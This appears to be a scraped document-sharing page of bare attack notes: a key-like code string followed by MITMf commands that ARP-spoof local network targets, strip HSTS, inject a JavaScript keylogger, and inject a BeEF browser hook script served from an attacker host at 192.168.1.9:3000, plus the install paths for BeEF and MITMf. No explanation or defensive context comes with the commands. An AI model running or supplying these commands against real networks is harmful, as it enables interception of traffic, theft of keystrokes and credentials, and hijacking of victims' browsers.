You are on page 1of 1

JY4TJ-68L9H-8ZQE1-GA1Q2-03K22

mitmf --hsts --arp --spoof -i eth0 --target 192.168.1.15 --gateway 192.168.1.1


mitmf --arp --spoof -i eth0 --target 192.168.1.4 --gateway 192.168.1.1 --jskeylo
gger
/usr/share/beef-xss
/usr/share/mitmf
mitmf --hsts --arp --spoof -i eth0 --target 192.168.1.7 --gateway 192.168.1.1 -inject --js-url http://192.168.1.9:3000/hook.js

You might also like